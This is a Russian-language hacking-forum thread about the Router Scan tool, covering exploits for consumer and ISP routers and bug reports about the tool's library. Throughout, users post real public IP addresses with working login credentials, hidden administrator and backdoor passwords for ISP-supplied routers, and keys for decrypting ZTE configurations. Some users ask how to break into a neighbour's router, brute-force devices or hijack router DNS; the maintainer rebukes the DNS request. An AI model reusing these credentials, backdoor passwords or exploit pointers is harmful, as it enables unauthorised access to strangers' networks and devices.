Ползуясь к примеру связкой WigleWiFi и этой прогой можно добиться неплохих результатов по своему городу и нетолько.
Тоже так
Подскажите , а в настройке проги Output какой логи и парол вбивать ? где регестрироваться нужно ?
binarymaster
01.02.2018, 00:32
уважаемый binarymaster... тут сегодня нарвался на один эксплойт на AsusWRT Router от 22/01/2018. по-моему его можно реализовать в роутерскане (если он еще не реализован). посмотрите, если не сложно.
https://cxsecurity.com/issue/WLB-2018010263
сам разобраться не могу (стыдно признаться-не хватает знаний. но работаем над самообразованием ).
@Felis-Sapiens (https://forum.antichat.xyz/members/268504/) смог найти брешь, позволяющую с помощью этой уязвимости скачать файл конфигурации! (получить логин с паролем)
Правда это возможно проделать лишь в том случае, если на роутер ещё никто не логинился.
Также мне удалось найти способ удалённой перезагрузки без авторизации, с этой же уязвимостью. Собственно, в Router Scan мной был добавлен только первый, более-менее безобидный эксплойт, из соображений сохранения популяции точек доступа.
Felis-Sapiens
01.02.2018, 00:41
Правда это возможно проделать лишь в том случае, если на роутер ещё никто не логинился.
Дополню - не логинился с момента последнего старта httpd.
C0D3BR34K3R
01.02.2018, 21:24
Также мне удалось найти способ удалённой перезагрузки без авторизации, с этой же уязвимостью.
отдельно, можете описать этот эксплоит?
CRACK211
02.02.2018, 18:39
https://github.com/wi-fi-analyzer/wpspin
http://airslax.net/_fr/1/wps_pin.txt
https://github.com/wi-fi-analyzer/wpspin
Вдруг пригодиться)
Pebenok70
02.02.2018, 20:30
binarymaster,
Есть TRENDnet TEW-637AP. Ошибка с BSSID.
NETGEAR DG834G, ESSID не отпарсился.
Из новых : DIR-524, NETGEAR R7900, CastleNet, Thomson/Technicolor
Linksys WAP300N WAP610N
И ещё всякие разные.
С чего можно начать? На что сейчас время будет?
muradddddd
02.02.2018, 23:43
Я хотел спросить если абонент роутера Asus скроет свою сеть через роутер скан определиться его ssid?
binarymaster
03.02.2018, 18:48
Я хотел спросить если абонент роутера Asus скроет свою сеть через роутер скан определиться его ssid?
Из веб интерфейса роутера SSID ведь никуда не денется.
отдельно, можете описать этот эксплоит?
Тоже заинтересовался. Куда копать хотя бы?
хорош беспределить с подменной днс, уже 2 соседям ростелекомовские возвращал
connoppp.cgi
Для ревизий с этим скриптом подходит и старый эксплоит 09 года adminpasswd.cgi.
Для ревизий с этим скриптом подходит и старый эксплоит 09 года adminpasswd.cgi.
увы с версией прошивки 4.07 не работает. пост бесполезен...
46.251.7.32:8080 admin:admin какой-то DS-Link (вроде уличные роутеры) определяется как ZTE WebProc и больше инфы нет.
46.251.56.168 user:user определяется как Dual Band WLAN Access Point на самом деле Cgates R7900-A3 инфу пока не берет.
46.251.32.95 root:admin определяется AirStation является BUFFALO WHR-HP-GN инфу не берет
109.172.213.126 admin:admin определяется как httpd а он LB-LINK WRFT-2205-11N-5357-EN-1.0.0
109.172.196.109:8080 пароль пустой определяется как Seems to be LevelOne Broadband Router
сам Belkin F6D4230 инфу не получает
92.246.145.207 user:user определяет как index.htm на самом деле D-Link DSL2740U инфу не вытаскивает
5.227.121.84 admin:admin определяется как Goahead/2.5.0 PeerSec-MatrixSSL/3.2.1-OPEN сам-же Robustel R3000-3P инфу не видит
5.227.121.12 user:user определяется mobile router сам-же какаято моторола инфу не видит
У меня рац-предложение для секции Wireless Networks в RS(может моветон, не знаю):
- поднатужится, и показать свои отчёты MAC-ов, уязвимых для аудита "pixie dust".
Естественно, с хотя бы минимальными пруфами(логи), пусть даже и размыленные масками.
И думаю, сторонние источники(проверенные), будут кстати.
CRACK211
08.02.2018, 00:10
https://www.exploit-db.com/exploits/43387/?rss
https://www.exploit-db.com/exploits/42739/?rss
https://www.exploit-db.com/exploits/42740/?rss
https://www.exploit-db.com/exploits/42591/?rss
https://www.exploit-db.com/exploits/42320/?rss
https://www.exploit-db.com/exploits/42323/?rss
https://www.exploit-db.com/exploits/43118/?rss
https://www.exploit-db.com/exploits/43105/?rss
https://www.exploit-db.com/exploits/42739/?rss
Может будет полезно )
5.228.176.16 без пароля определяется Boa/0.94.14rc21 (Realtek Semiconductor Corp. | WIRELESS ROUTER) инфу не вытаскивает
37.110.25.108,95.84.228.212 без пароля определяется Boa/0.94.14rc21 (Upvel UR-315BN) инфу не вытаскивает
37.204.27.250 admin:admin определяется как Boa/0.94.14rc21 сам Sapido GR297n инфу не вытаскивает
OldSchool1990
08.02.2018, 20:18
37.144.147.74 Помогите подобрать пароль. Порт 7547
xDillion
09.02.2018, 20:37
Извиняюсь заранее за вопрос, который за несколько лет мог здесь уже прозвучать, но он меня очень интересует. Есть ли какой-либо способ менять DNS роутера автоматически, чтобы это делала программа, либо эта, либо еще какая-нибудь? Потому что кроме как писать скрипт на JS под каждый интерфейс ничего в голову не приходит. Или вы знаете о подобных программах, куда можно список запить. Заранее благодарю за ответ.
binarymaster
09.02.2018, 21:59
37.144.147.74 Помогите подобрать пароль. Порт 7547
Смысл? Это TR-069.
Есть ли какой-либо способ менять DNS роутера автоматически
Вот из-за таких, как вы, мы теряем точки доступа и доступ к сетям.
По-хорошему забанить бы вас, только потом ещё сотня таких же придёт.
binarymaster
10.02.2018, 18:06
В прошлом году Ростелеком стала ставить новые роутеры InnboxE70 определяется как Alpha_webserv (InnboxE70) Есть дыра. Скрытый администратор. Логин superadmin. Пароль y_8v&MzwRPXL33.
Добавил в поддержку, благодарю.
binarymaster
10.02.2018, 20:23
5.228.14.225:80
5.228.16.193:443
5.228.17.213:443
5.228.35.122:443
5.228.39.196:443
5.228.62.91:80 user:user отпарсился
5.228.68.58:80
5.228.70.125:80
5.228.71.44:80
5.228.76.26:80
5.228.89.177:80
У меня всё отпарсило. Иногда приходится применять пересканирование, если не залогинилось.
binarymaster
10.02.2018, 23:37
Thomson/Technicolor
154.70.16.38
154.70.16.222
154.70.21.76
154.70.31.164
154.70.36.254
154.70.41.229
154.70.44.13
154.70.51.87
Добавил. Остальные пока смотреть не буду, там новые модели.
С завтрашнего дня ухожу в отпуск на 20 дней, не шумите тут сильно в моё отсутствие.
С завтрашнего дня ухожу в отпуск на 20 дней
заявление на отпуск оформили??))
Pebenok70
10.02.2018, 23:48
С завтрашнего дня ухожу в отпуск на 20 дней, не шумите тут сильно в моё отсутствие.
Хорошего отдыха! Нужное дело. Постараемся уж как-нибудь тихо сидеть
Как заставить прогу сканировать только беспроводной эфир?
Адаптер видит, чекбоксы Enable discovery/Cumulative mode отмечены. Сканировал - пусто.
startless
13.02.2018, 10:16
А беспроводное соединение включено?
Добавил. Остальные пока смотреть не буду, там новые модели.
С завтрашнего дня ухожу в отпуск на 20 дней, не шумите тут сильно в моё отсутствие.
У Сюи заявление о отпуске подписал?
Хорошо отдохнуть, набраться сил и готовиться к новым открытиям.
А беспроводное соединение включено?
Нет конечно. А зачем?
Пересканировал - видит. Бывает туплю, mea culpa.
startless
13.02.2018, 10:40
Нет конечно. А зачем?
Пересканировал - видит. Бывает туплю, mea culpa.
Да, известные грабли, сам на них сколько раз наступал. Без включенного беспроводного соединения даже в виртуалке airodump сканирует но ничего не видит
Triton_Mgn
14.02.2018, 05:18
Хватит приколов binarymaster в отпуске, значит копим в блокнотик.
и не пишем 20 дней.
И
Есть ли какой-либо способ менять DNS роутера автоматически, чтобы это делала программа, либо эта, либо еще какая-нибудь? Потому что кроме как писать скрипт на JS под каждый интерфейс ничего в голову не приходит. Или вы знаете о подобных программах, куда можно список запить.
вмрусняк такой был. использовал дефлотные пасы роутеров. а программ таких нет. по той простой причине, что серьезные люди такой х..й (массовой заменой днс) не занимаются, а неадекватам из числа школоты (именно дол...м, потому как не вся школота дурью мается) не хватает знаний.(никого лично не имел ввиду)
а можно как то либо вытащить с роутера пароль и логин который был поставлен вместо admin admin в панеле управления?
Я позакрывал доступ снаружи там, где сам его открывал, а где смог, сменил порт на сильно нестандартный. Пора школомайнерам краник перекрыть, пушто уже достали.
сменил порт на сильно нестандартный
Хорошая мотивация для школоты изучить mirai и поправить код для автоматической смены днс.
а можно как то либо вытащить с роутера пароль и логин который был поставлен вместо admin admin в панеле управления?
смотря какой роутер. если есть уязвимость - используются эксплойты. кстати, роутерскан именно так зачастую и вытаскивает нестандартные пасы...
Скрипт для расшифровки здесь:
https://mega.nz/#!W0YE1IiR!Vvh0xWk0CBnC6Orsv9_hGyVO8f4-yxYJuCZeSy8YdAs
./decode_zte_config.py config.bin config.bin.xml --key '402c38de39bed665'
Парни, может кто нибудь у кого стоит среда, скомпилировать скрипт в бинарник для (x86-32)?
Угрёбся уже с накатыванием криптобиблиотек pycrypto и pycryptodome под WIN7.
Или макните меня носом в удобоваримый мануал(сразу предупреждаю, я электронщик а не кодер! ).
Triton_Mgn
17.02.2018, 19:45
Молчим.
https://whois.uanic.name/last-ip/1.html инфа по IP провайдеров и не только.
к примеру: Оценка стоимости сайта forum.antichat.ru $112 121 - является расчётной характеристикой и базируется на
ТД, которые видит мой адаптер и которые удалось вскрыть, добавить на карту нельзя?
Можно создать отчёт(отсканировать с помощью RS) и отправить.
Если RS пока не поддерживает ваши точки доступа, можно сформировать отчёт вручную, следуя этому шаблону:
"IP Address";"Port";"Time (ms)";"Status";"Authorization";"Server name / Realm name / Device type";"Radio Off";"Hidden";"BSSID";"ESSID";"Security";"Key";"WPS PIN";"LAN IP Address";"LAN Subnet Mask";"WAN IP Address";"WAN Subnet Mask";"WAN Gateway";"Domain Name Servers";"Latitude";"Longitude";"Comments"
Felis-Sapiens
18.02.2018, 18:13
Парни, может кто нибудь у кого стоит среда, скомпилировать скрипт в бинарник для (x86-32)?
Угрёбся уже с накатыванием криптобиблиотек pycrypto и pycryptodome под WIN7.
x64: http://rgho.st/6JhvHvDmj
decode_zte_config config.bin config.bin.xml --key "MIK@0STzKpB%qJZf"
Giorgi123
21.02.2018, 22:58
У мена выдаёт ошибку (access violation at address 00443C64......)вчем может бить проблема?
Aleksamdr
26.02.2018, 13:47
Ребята подскажите почему у меня вот уже неделю не выходит загрузить точки из роутер скан САМОЙ ПОСЛЕДНЕЙ ВЕРСИИ в базу 3wifi? При загрузке файла пишет ИДЕТ ЗАПИСЬ В БД ЗАГРУЖЕНО 0 НАЙДЕНО 0 при этом в файле есть 11 точек с паролями.
Обработчик подвис, ждем @binarymaster (https://forum.antichat.xyz/members/148032/) из отпуска.
9818876467
28.02.2018, 14:14
Подскажите, а есть или будет сей софт на iOS? Для андроида видел есть
будет сей софт на iOS?
Это фантастика
добрый вечер!
Не могу найти в LibRouter.pas как указать таймаут.
binarymaster
28.02.2018, 21:27
добрый вечер!
Не могу найти в LibRouter.pas как указать таймаут.
Таймаут чего именно? Соединение с портом проверяется на стороне GUI / сканера.
Таймаут чего именно? Соединение с портом проверяется на стороне GUI / сканера.
Таймаут соединения с портом. Т.е. мне самому разрывать соединение, если оно длится больше чем нужно? Получается отдельный поток нужен, который будет считать время выполнения каждого потока сканера? Я ж поток сканера могу контролировать только когда придет что то в SetTableDataW.. Выполнить FreeRouter(hRouter)? Да и указатель hRouter, он же не глобальный... к нему из другого потока не обратится... в общем запутался )
binarymaster
28.02.2018, 22:20
Т.е. мне самому разрывать соединение, если оно длится больше чем нужно?
Для этого есть функция StopRouter. Можно конечно и принудительно завершить поток.
Получается отдельный поток нужен, который будет считать время выполнения каждого потока сканера?
В Router Scan GUI именно так и сделано.
Да и указатель hRouter, он же не глобальный...
Откуда такое предположение? Он глобальный, в пределах адресного пространства процесса.
И вопрос по самому софту, некоторые роутеры Asus,
Для этого есть функция StopRouter. Можно конечно и принудительно завершить поток.
В Router Scan GUI именно так и сделано.
Откуда такое предположение? Он глобальный, в пределах адресного пространства процесса.
Сделал, не работает как нужно, stoprouter , срабатывает только после таймаута... после команды ждет 18 секунд....
Status: Loading main page... thread:1 time:22:00:45
StopRouter thread:1 time:22:00:48
Status: Can't load main page thread:1 time:22:01:06
Status: Cancelled thread:1 time:22:01:06
Status: Loading main page... thread:1 time:22:01:06
StopRouter thread:1 time:22:01:09
Status: Can't load main page thread:1 time:22:01:27
Status: Cancelled thread:1 time:22:01:27
Status: Loading main page... thread:1 time:22:01:27
StopRouter thread:1 time:22:01:30
Status: Can't load main page thread:1 time:22:01:48
Status: Cancelled thread:1 time:22:01:48
binarymaster
01.03.2018, 01:05
после команды ждет 18 секунд....
Нет возможности принудительно остановить HTTP клиент "правильным образом".
Нет возможности принудительно остановить HTTP клиент "правильным образом".
Так он и на закрытые порты ждет 18 секунд...
Сделаю проверку открыт ли порт, перед подключением http клиента, должно многократно увеличить скорость.
сделал проверку порта через winsock и один поток закрывает сокеты по таймауту... скорость многократно выросла...
binarymaster
01.03.2018, 14:14
@Vikhedgehog (https://forum.antichat.xyz/members/245415/) насчёт вот этого: https://forum.antichat.ru/threads/460420
Найди-ка мне пачку уязвимых ролтонов. Не помню, чтобы я добавлял это в RS.
Вопрос по эксплоитам, многие asus роутеры, после срабатывания эксплоита, при повторном сканировании того же диапазона уже не срабатывают, и при входе в роутер запускается мастер настройки роутера, где просят сменить пароль. Нужно войти в роутер, сохранить настройки, тогда эксплоит сработает. Получается если кто то прошел этим эксплоитом по диапазону ip, сканить после него бесполезно, уже не сработает. Может не срабатывает из за того, что при входе попадает на страницу мастера настройки, а не главную?
binarymaster
01.03.2018, 20:05
Вопрос по эксплоитам, многие asus роутеры, после срабатывания эксплоита, при повторном сканировании того же диапазона уже не срабатывают
Есть эксплойты, которые срабатывают только 1 раз, и это известно сообществу.
https://forum.antichat.ru/posts/4179589
Vikhedgehog
02.03.2018, 00:41
@Vikhedgehog (https://forum.antichat.xyz/members/245415/) насчёт вот этого: https://forum.antichat.ru/threads/460420
Найди-ка мне пачку уязвимых ролтонов. Не помню, чтобы я добавлял это в RS.
RS распознает подобные роутеры? Или ограничивается заголовком типа "lighthttpd"?
Triton_Mgn
02.03.2018, 00:52
Почему вопросы - бро. Вам сказали помогите епта.
Скажем так, если ты не знаешь как помочь, то и ладно.
Кто и как распознает RS - все очевидно ...
binarymaster
02.03.2018, 00:57
RS распознает подобные роутеры? Или ограничивается заголовком типа "lighthttpd"?
Не в курсе, поэтому и запросил образцы.
Почему вопросы - бро. Вам сказали помогите епта.
Скажем так, если ты не знаешь как помочь, то и ладно.
Можно было ответить мягче.
can you add this to the new router scan to get user and password or bruteforce
https://163.11.190.106/
http://98.114.180.182:8080/
http://163.11.185.73/
or any one have brute force for this
Вопрос по BSSID... Почему он меняется у роутера? Когда удалось войти BSSID один, когда нет, другой.
Status: Loading main page... thread:1 time:23:45:52
Status: Got main page thread:1 time:23:45:55
Type: httpd/2.0 thread:1 time:23:45:55
Status: Detecting model... thread:1 time:23:45:55
Type: ASUS RT-AC58U, firmware: 2.0 thread:1 time:23:45:55
Status: Trying exploits... thread:1 time:23:45:55
Status: Trying exploits... thread:1 time:23:45:55
BSSID: *:*:*:*:FC:84 thread:1 time:23:45:55
SSID: Notarius thread:1 time:23:45:55
Auth: admin:admin thread:1 time:23:45:58
Status: Logged in thread:1 time:23:45:58
Status: Getting info... thread:1 time:23:45:58
BSSID: *:*:*:*:FC:80 thread:1 time:23:45:59
binarymaster
02.03.2018, 09:37
https://163.11.190.106/
http://98.114.180.182:8080/
http://163.11.185.73/
Those devices are not routers (Polycom SoundPoint IP 560).
Вопрос по BSSID... Почему он меняется у роутера? Когда удалось войти BSSID один, когда нет, другой.
Эксплойт получает 5 ГГц BSSID, при логине парсер обрабатывает 2.4 ГГц BSSID.
В идеале RS должен парсить только 2.4, но в случае когда он недоступен, обрабатывается 5G.
Triton_Mgn
02.03.2018, 10:02
ww.youtube.com/watch?v=kREiH7kNKUk
Как отключить HNAP?
Если я не задаю stPairsBasic,stPairsDigest, stPairsForm логин и пароль не подбирается? Только эксплоиты?
Как работает stFilterRules ?
И как соксы правильно подключать?
SetParam(stProxyType,pchar('SOCKS5'));
SetParam(stProxyIP, pchar(ip);
SetParam(stProxyPort, pchar(port));
И как проверить, установлено ли подключение к соксу, что бы другой использовать, если подключение неудачно.
you mean no one can create brute force for this
https://163.11.190.106/
http://98.114.180.182:8080/
http://163.11.185.73/
password from list
binarymaster
02.03.2018, 20:28
Как отключить HNAP?
Отключить модуль HNAP.
Если я не задаю stPairsBasic,stPairsDigest, stPairsForm логин и пароль не подбирается?
Брутфорс работать не будет, стандартные зашитые логины/пароли будут.
Как работает stFilterRules ?
Читать документацию.
И как соксы правильно подключать?
Не помню, документировано ли это, но данный параметр принимает целое число (константу) в качестве аргумента:
enum {
PROXYTYPE_HTTP = 1,
PROXYTYPE_CONNECT,
PROXYTYPE_SOCKS4,
PROXYTYPE_SOCKS4A,
PROXYTYPE_SOCKS5
}
И как проверить, установлено ли подключение к соксу, что бы другой использовать, если подключение неудачно.
Своими средствами.
you mean no one can create brute force for this
I won't add them because they are not Wi-Fi devices.
Прокси устанавливается для всех потоков? Есть возможность установить для каждого свой?
В PrepareRouter прокси прописывается? если изменить его после, изменится для текущего потока?
И почему то librouter не компилируется под x64 .. только x32... отключаю librouter, все запускается.
Консольная демка тоже под x64 не запускается.
x64 только консольная под linux?
Monashka
03.03.2018, 15:22
В: Как ввести пустой ПИН на Android?<br/>
О: Никак
https://s8.hostingkartinok.com/uploads/thumbs/2018/03/9ea3605a1adb2ae3f7c49aee37cbf0b0.png
Добрый вечер.Народ подскажите по такому вопросу.В RS через PIN пытаюсь зайти на точку.RS показывает вроде что PIN активный и не залочен, а при попытке зайти выдает такой лог
Associating with AP...
[+] Associated with AC:84:C9:EF:52:80 (ESSID: RT-WiFi_2.4GHz_5280).
Trying pin "00972406"...
Received Identity Request.
Received WPS Message M1.
Received WSC NACK.
[-] Error: Enrollee/AP does not support PIN method.
EAP session closed.
Trying pin "00972406"...
Trying pin "00972406"...
Trying pin "00972406"...
Trying pin "00972406"...
Trying pin "00972406"...
Trying pin "00972406"...
[-] Packet send failed.
Error count exceeded, stopping...
Audit stopped at 2018.03.03 15:41:34 (UTC+04:00).
По этому логу мне сказали что вроде точка не поддерживает метод PIN ,но порекомендовали еще тут спросить.Кто знает или может помочь буду благодарен.
binarymaster
03.03.2018, 18:22
Прокси устанавливается для всех потоков?
Да, глобально.
В PrepareRouter прокси прописывается?
Разве в документации не достаточно понятно описано, какие аргументы у этой функции?
изменится для текущего потока?
Настройки прокси применяются мгновенно.
x64 только консольная под linux?
librouter.so для Linux скомпилирована под x64, если вы про ту версию, которая была выложена в чате Telegram. Библиотека librouter.dll для Windows - под x86.
По этому логу мне сказали что вроде точка не поддерживает метод PIN
Всё правильно вам сказали.
Настройки прокси применяются мгновенно.
ммм, сейчас в каждом потоке меняю прокси перед scanrouter, работает, и находит, но не пойму насколько криво оно работает. Прокси в scanrouter прописывается http клиенту один раз? если его изменить другим потоком, после начала scanrouter, текущую операцию http клиент закончит со старым прокси? Все модули routerscan отключены, кроме главного. http клиент все делает одним соединением? получение главной страницы, параметров роутера, эксплоиты, или для каждого действия заново прописывается прокси? Пытаюсь понять будет ли глючить при такой работе, что бы не было, что каждое действие выполняется с разного ip.
binarymaster
04.03.2018, 13:05
Пытаюсь понять будет ли глючить при такой работе, что бы не было, что каждое действие выполняется с разного ip.
Не удастся такого добиться, я же сказал выше, что настройки прокси - глобальные. Каждый новый HTTP запрос берёт свежие настройки прокси.
И на каждый запрос используется новое соединение, keep-alive не поддерживается.
Добавьте пожалуйста, не парсит:
81.191.128.110 80 2016 Done admin: AirTies AIR-4920
81.191.128.199 80 844 Done admin: AirTies AIR-4920
81.191.128.254 80 1375 Done admin: AirTies AIR-4920
81.191.133.120 80 1094 Done admin: AirTies AIR-4920
81.191.133.212 80 1031 Done admin: AirTies AIR-4920
Не удастся такого добиться, я же сказал выше, что настройки прокси - глобальные. Каждый новый HTTP запрос берёт свежие настройки прокси.
И на каждый запрос используется новое соединение, keep-alive не поддерживается.
Ну так если полностью новые соединения, значит cookies не играют роли? Если соединения http клиента могут быть с разных ip, результат будет тот же? Главное что бы все соксы были рабочими...
binarymaster
04.03.2018, 22:15
Ну так если полностью новые соединения, значит cookies не играют роли?
Какой-то странный у вас вывод, я писал в терминах сокетных соединений. Cookies сохраняются внутри сессии.
Если соединения http клиента могут быть с разных ip, результат будет тот же?
Большинство роутеров привязывают сессию к IP, не давая войти под другим, делайте выводы.
понятно, менять прокси не получится, только через одно прокси, сразу для всех потоков.
А с x64 версией dll какие то проблемы? Вроде ж все библиотеки которые она использует имеют x64 версию... В будущем не планируется?
Pebenok70
05.03.2018, 20:36
80.14.1.105:8080 admin:password NETGEAR DG834G нет ESSID
88.161.80.99:80 admin:admin TRENDnet TEW-637AP BSSID в таком виде
Может пригодятся DSL-2730U 41.142.1.224:80 user:user
DSL-2740U 41.142.73.124:80 admin:admin
Huawei HG556a 41.142.23.201:80 support:support
binarymaster
05.03.2018, 23:12
80.14.1.105:8080 adminassword NETGEAR DG834G нет ESSID
88.161.80.99:80 admin:admin TRENDnet TEW-637AP BSSID в таком виде <span id="wlan_mac">&nbsp;</span>
Пофиксил.
Может пригодится DSL-2730U 41.142.1.224:80 user:user
Huawei HG556a 41.142.23.201:80 support:support
Повезло, для этих моделей уже были реализованы парсеры, так что добавил.
Только не знаю, как из Huawei HG556a достать BSSID.
Vikhedgehog
06.03.2018, 06:28
---
Что за прога такая?
Заранее прошу прощения за невежество.
Triton_Mgn
06.03.2018, 07:09
Какая? Сэр..
Что за прога такая?
Приложение
defrom2019
08.03.2018, 05:19
скажите пож как можно взламать роутар TL-MR6400 , не могу зайти у соседа , спасибо за ранее.
Есть вопрос. Добавил в файлы пары логин/пароль (достаточно большое количество), перебор доходит максимум до 30%, дальше статус cancelled. В мануалах что-то не нашёл, что нужно изменить, таймауты все увеличил, толку не дало.
binarymaster
08.03.2018, 13:05
доходит максимум до 30%, дальше статус cancelled
таймауты все увеличил
Значит не все.
Значит не все.
Какой конкретно влияет на это?
Таймаут потока
Устанавливает время жизни потока в минутах, т.е. порог ожидания обработки устройства. Если процесс обработки не успел уложиться в отведённое время, он принудительно завершается программой, и в колонке состояния появится пометка Timed out.
?
Статус то другой.. Ставил 20 минут, но столько времени вроде не проходит. Может косяк в какой строке словаря. Опять же процент перед отменой всегда разный. Попробую вообще отключить этот таймаут. В главном окне таймаут соединения на 10000 поставил, но как понимаю он не за перебор отвечает..?
binarymaster
08.03.2018, 20:10
В главном окне таймаут соединения на 10000 поставил, но как понимаю он не за перебор отвечает..?
В документации всё описано, какой параметр за что отвечает, не ломайте ни себе ни нам головы.
в колонке состояния появится пометка Timed out.
?
Статус то другой..
Времена меняются, теперь либо Cancelled, либо Timed out.
Привет! ASUS RT-N18U есть в списке поддерживаемых роутеров. Но RS при скане выдает только firmware: 2.0 + BSSID и ESSID. Но прошивка там точно не ниже 3.0. Или под версией firmware что-то другое подразумевается? Неужели для N18U нет никаких эксплоитов?
Но RS при скане выдает только firmware: 2.0
Значит тебя обогнали с эксплоитом (тот работает только 1 раз) или в роутер уже логинились или пытались.
Жди пока аппарат перезагрузят.
binarymaster
09.03.2018, 01:53
Или под версией firmware что-то другое подразумевается?
На самом деле это условное разделение на ASUS'ы нового поколения и старого.
Все асусы с кастомной формой авторизации помечаются как 2.0, старые использовали базовую аутентификацию.
Жди пока аппарат перезагрузят.
Можно ли как-то роутер заставить уйти в ребут?
binarymaster
09.03.2018, 14:59
Но RS при скане выдает только firmware: 2.0 + BSSID и ESSID.
На 3WiFi этот аппарат есть / находится поиском?
На 3WiFi этот аппарат есть / находится поиском?
Да, есть. D0:17:C2:63:C0:44
binarymaster
09.03.2018, 22:14
Да, есть. D0:17:C2:63:C0:44
Вот и славно, значит в ближайшее время его нет особого смысла пересканировать. Все нужные данные уже есть в 3WiFi.
Вот и славно, значит в ближайшее время его нет особого смысли а пересканировать. Все нужные данные уже есть в 3WiFi.
Так-то оно так. Просто я пытаюсь понять почему РС по роутерам ASUS выдает максимум BSSID и ESSID? Проверял на 3х ближайших точках RT-N66U, RT-N18U и RT-N10U.
binarymaster
10.03.2018, 14:18
Просто я пытаюсь понять почему РС по роутерам ASUS выдает максимум BSSID и ESSID?
Читали бы тему, и пользовались поиском...
https://forum.antichat.ru/posts/4035248
https://forum.antichat.ru/posts/4177926
И ответ на вопрос "почему не получает пароль":
https://forum.antichat.ru/posts/4179586
binarymaster, если в роутере asus n18 выключен вообще доступ из веб ( у меня дома такой стоит), то эксплойт не сработает же?
Или все равно есть веб доступ или нет?
Вот призадумался я чтото, пароль сделал себе на вайфай хрен знает какой длинный, WPS вообще выключил ))
binarymaster
10.03.2018, 18:06
если в роутере asus n18 выключен вообще доступ из веб ( у меня дома такой стоит), то эксплойт не сработает же?
Или все равно есть веб доступ или нет?
Просто проверьте, проходит ли соединение к вашему роутеру с внешнего IP.
Например с помощью этих сервисов:
http://canyouseeme.org/
https://mxtoolbox.com/portscan.aspx
Доброго времени товарищи. Пожалуйста помогите.
Вот я свой ай-пи узнал,вот я узнал все диапазоны своего ай-пи,вот я вставил это все в программу,затем заходим в саму программу и нажимаем Start Scan.Перехожу на вкладку Good Results и жду.. ВСЁ вижу появляются данные..Вижу даже есть названия разных роутеров,вижу ЛОГИНЫ есть,вижу Пароли есть.
Что мне с этим всем делать-то ?! Куда вписывать,чтобы получить соседский ( или какой там его) интернет?!. как вообще выбрать оптимальный для себя вариант (по скорости,по доступности..)
P.S. Авантек-плюс.
(завтра конец оплате)
Спасибо друзья.
Доброго времени товарищи. Пожалуйста помогите.
Вот я свой ай-пи узнал,вот я узнал все диапазоны своего ай-пи,вот я вставил это все в программу,затем заходим в саму программу и нажимаем Start Scan.Перехожу на вкладку Good Results и жду.. ВСЁ вижу появляются данные..Вижу даже есть названия разных роутеров,вижу ЛОГИНЫ есть,вижу Пароли есть.
Что мне с этим всем делать-то ?! Куда вписывать,чтобы получить соседский ( или какой там его) интернет?!. как вообще выбрать оптимальный для себя вариант (по скорости,по доступности..)
P.S. Авантек-плюс.
(завтра конец оплате)
Спасибо друзья.
вообще-то в Вашем случае-лучше просто заплатить абонплату. если вы задаете такие вопросы, то пока не стоит играться с роутерсканом.
тут готовых рецептов быть не может. то, что вы просканировали определенный диапазон, совсем не факт, что соседский будет рядом (читайте о выделении пулов адресов). попробуйте посмотреть в гудах, есть-ли ессиды ваших соседей.попробуте воспользоваться уберфичей роутерскана и напрямую вскрыть вайфай. если нашли-то точно так-же подключаетесь, как к обычному вайфай. куда прописывать в винде (а мне кажется, что у вас именно винда),можно разобраться без мануалов.при подключении выйдет окошко с вводом пароля
Что за прога такая?
Заранее прошу прощения за невежество.
Какая? Сэр..
Wifi Warden. в плеймаркете есть. там еще одна неплохая - wps wpa tester.
Pebenok70
11.03.2018, 18:43
Попались Nateks FG-ACE-IAD-4-GW RS не определяет. :80 admin:admin
87.117.8.212
87.117.8.185
87.117.3.58
Может будут интересны. Их приличное количество.
Ещё есть 4G билайновские с WIFI. Тоже Unknown :80 admin
89.113.7.195
89.113.6.233
binarymaster
11.03.2018, 18:57
вообще-то в Вашем случае-лучше просто заплатить абонплату. если вы задаете такие вопросы, то пока не стоит играться с роутерсканом.
тут готовых рецептов быть не может. то, что вы просканировали определенный диапазон, совсем не факт, что соседский будет рядом
http://stascorp.com/load/1-1-0-56#ent4486
С этим товарищем я уже побеседовал в комментах... тёмный лес, даже Wi-Fi у него нет.
Monashka
11.03.2018, 19:22
Лучше б был ещё одноконопочный вариант с результатами по окончанию.
А еще лучше - программа с одной огромной кнопкой, прямо на весь экран: ХАЦКНУТЬ ВСЕХ САСЕДЕЙ!!!
muradddddd
12.03.2018, 00:33
Через роутеры майнить можна было бы воше шикарно было бы.
при работе с librouter.dll почему то происходит утечка памяти. Проверял с помощью Madexcept, в моем коде утечек нет. Причем после завершения программы вся утечка остается в ОЗУ. Может как то нужно чистить? логи в памяти не хранятся?
и нашел ошибку парсинга, не удаляет теги:
Firmware: DD-WRT v23 SP1 (04/03/06)
Status: Got main page thread:10 time:0:38:43
Type: httpd (DD-WRT - Info) thread:10 time:0:38:43
Status: Detecting model... thread:10 time:0:38:43
Type: DD-WRT (name: DD-WRT) thread:10 time:0:38:43
BSSID: 00:16:01:4B:69:0C thread:10 time:0:38:43
SSID: dd-wrt thread:10 time:0:38:43
WANIP: 89.32.161.217 thread:10 time:0:38:43
Felis-Sapiens
15.03.2018, 10:10
при работе с librouter.dll почему то происходит утечка памяти. Проверял с помощью Madexcept, в моем коде утечек нет. Причем после завершения программы вся утечка остается в ОЗУ. Может как то нужно чистить? логи в памяти не хранятся?
Логи Madexcept скиньте. Сколь свежая версия librouter.dll?
binarymaster
15.03.2018, 17:06
Type: DD-WRT (name: <span id="router_name">DD-WRT)
Исправил ошибку парсинга.
binarymaster
15.03.2018, 17:52
В Beeline SmartBox Логин SuperUser пароль Beeline$martB0x только в прошивке до 2.0.25 в последующих пароль для SuperUser SFXXXXXXXXXX (серийный номер)
Давно известная информация.
Появилось полно роутеров которые определяются как Seems to be Micro DSL Router. Telnet пишет BCM96328 Broadband Router
Это не adsl роутеры точно.
Micro DSL - название прошивки, на которой работают Broadcom роутеры.
Токже очень много вида RomPager/4.07 UPnP/1.0 (Object Not Found) Тоже не понятно что это.
Какие-то устройства на базе ZyNOS, вряд ли Wi-Fi роутеры, могут быть провайдерские свитчи.
На просторах нета наткнулся на superadmin для huawei HG552F-11 в списке поддерживаемых вроде нет.
Логин superadmin пароль !@HuaweiHgw Проверить возможности нет. Такие не встречались.
Надо добыть!
CRACK211
15.03.2018, 18:55
Huawei – EchoLife HG520s (Saudi Telecom Firmware) Afaq_shamel:stccpe_2007
Huawei – EchoLife BM621 (Huawei Firmware) admin:2008x2BJAOTOtJK1
Логи Madexcept скиньте. Сколь свежая версия librouter.dll?
